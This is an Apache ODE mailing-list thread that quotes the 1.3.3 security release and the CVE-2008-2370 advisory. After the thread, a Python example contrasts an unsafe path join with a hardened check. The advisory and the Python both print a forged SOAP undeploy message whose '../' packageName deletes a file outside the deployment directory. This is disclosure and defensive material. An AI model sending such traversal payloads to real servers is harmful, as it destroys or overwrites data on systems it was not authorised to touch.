> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements.
> See the release notes for an exhaustive list for details:
> <https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should obtain
> the latest source from svn or apply the patch published under
> <http://people.apache.org/~mriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
>                   xmlns:pmap="http://www.apache.org/ode/pmapi">
>  <soapenv:Header/>
>  <soapenv:Body>
>     <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>     </pmap:undeploy>
>  </soapenv:Body>
> </soapenv:Envelope>
>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>
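As an added illustration of the advisory quoted above (this is not code from the announcement or from ODE itself), the following Python puts the unchecked path join that makes a forged packageName walk out of the deployment directory beside a hardened check a deployment service can apply before touching the file system. The deployment root is a hypothetical placeholder, and the request is constructed to mirror the advisory's undeploy message.

```python
import os
import re
import xml.etree.ElementTree as ET

# Added example, not ODE's own code.
PMAPI_NS = "http://www.apache.org/ode/pmapi"

# Hypothetical deployment root; ODE's real directory layout is not asserted here.
DEPLOY_ROOT = "/opt/ode/processes"

# A package name must be a single path component: no separators, no leading dot.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")

# Constructed request mirroring the advisory's undeploy message.
UNDEPLOY_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:pmap="http://www.apache.org/ode/pmapi">
 <soapenv:Header/>
 <soapenv:Body>
  <pmap:undeploy>
   <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
  </pmap:undeploy>
 </soapenv:Body>
</soapenv:Envelope>"""


def package_name_from_undeploy(soap_xml):
    """Extract the (unqualified) packageName child of pmap:undeploy."""
    root = ET.fromstring(soap_xml)
    el = root.find(".//{%s}undeploy/packageName" % PMAPI_NS)
    if el is None or not (el.text or "").strip():
        raise ValueError("undeploy request carries no packageName")
    return el.text.strip()


def unchecked_target(deploy_root, package_name):
    """The unsafe pattern the advisory describes: the caller-supplied name is
    joined into a path with no validation, so '..' walks out of the root."""
    return os.path.normpath(os.path.join(deploy_root, package_name))


def checked_target(deploy_root, package_name):
    """Hardened form: accept only a plain name, then prove the resolved path
    is still inside the deployment root (realpath also follows symlinks)."""
    if not SAFE_NAME.match(package_name):
        raise ValueError("illegal package name: %r" % package_name)
    root = os.path.realpath(deploy_root)
    target = os.path.realpath(os.path.join(root, package_name))
    if os.path.commonpath([root, target]) != root or target == root:
        raise ValueError("package name escapes the deployment root")
    return target
```

The allow-list regex is the check that actually rejects the forged name; the realpath containment test is a second line of defence that also catches symlinked package directories.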
